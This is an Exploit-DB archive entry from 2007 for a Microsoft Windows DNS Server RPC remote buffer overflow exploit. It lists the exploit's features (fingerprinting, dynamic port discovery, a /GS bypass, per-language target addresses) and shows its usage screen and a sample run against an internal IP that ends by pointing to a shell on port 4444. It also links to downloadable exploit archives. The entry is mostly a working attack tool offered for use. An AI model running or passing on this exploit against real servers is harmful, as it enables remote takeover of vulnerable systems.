Microsoft Windows - DNS RPC Remote Buffer Overflow (2)

EDB-ID:

3746


Platform:

Windows

Published:

2007-04-18

  Exploit v2 features:
  - Target Remote port 445 (by default but requires auth)
  - Manual target for dynamic tcp port (without auth)
  - Automatic search for dynamic dns rpc port
  - Local and remote OS fingerprinting (auto target)
  - Windows 2000 server and Windows 2003 server (Spanish) supported by default
  - Fixed bug with Windows 2003 Shellcode
  - Universal local exploit for Win2k (automatic search for opcodes)
  - Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled)
  - Added targets for remote win2k English and italian (not tested, found with metasploit opcode database. please report your owns)
  - Microsoft RPC api used ( who cares? :p )


D:\Programación\DNSTEST>dnstest
 --------------------------------------------------------------
 Microsoft Dns Server local & remote RPC Exploit code
 Exploit code by Andres Tarasco & Mario Ballano
 Tested against Windows 2000 server SP4 and Windows 2003 SP2
 --------------------------------------------------------------

 Usage:   dnstest -h 127.0.0.1 (Universal local exploit)
          dnstest -h host [-t id] [-p port]
 Targets:
      0 (0x30270b0b) - Win2k3 server SP2 Universal - (default for win2k3)
      1 (0x79467ef8) - Win2k  server SP4 Spanish -   (default for win2k )
      2 (0x7c4fedbb) - Win2k  server SP4 English
      3 (0x7963edbb) - Win2k  server SP4 Italian
      4 (0x41414141) - Windows all Denial of Service


D:\Programación\DNSTEST>dnstest.exe -h 192.168.1.2
 --------------------------------------------------------------
 Microsoft Dns Server local & remote RPC Exploit code
 Exploit code by Andres Tarasco & Mario Ballano
 Tested against Windows 2000 server SP4 and Windows 2003 SP2
 --------------------------------------------------------------

[+] Trying to fingerprint target.. (05.02)
[+] Remote Host identified as Windows 2003
[-] No port selected. Trying Ninja sk1llz
[+] Binding to ncacn_ip_tcp: 192.168.1.2
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.2[1105]
[+] Dynamic DNS rpc port found (1105)
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.2[1105]
[+] RpcBindingFromStringBinding success
[+] Sending Exploit code to DnssrvOperation()
[+] Now try to connect to port 4444


also available at

http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip
http://www.48bits.com/exploits/dnsxpl.v2.1.zip 
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3746.zip (04172007-dnsxpl.v2.1.zip)

# milw0rm.com [2007-04-18]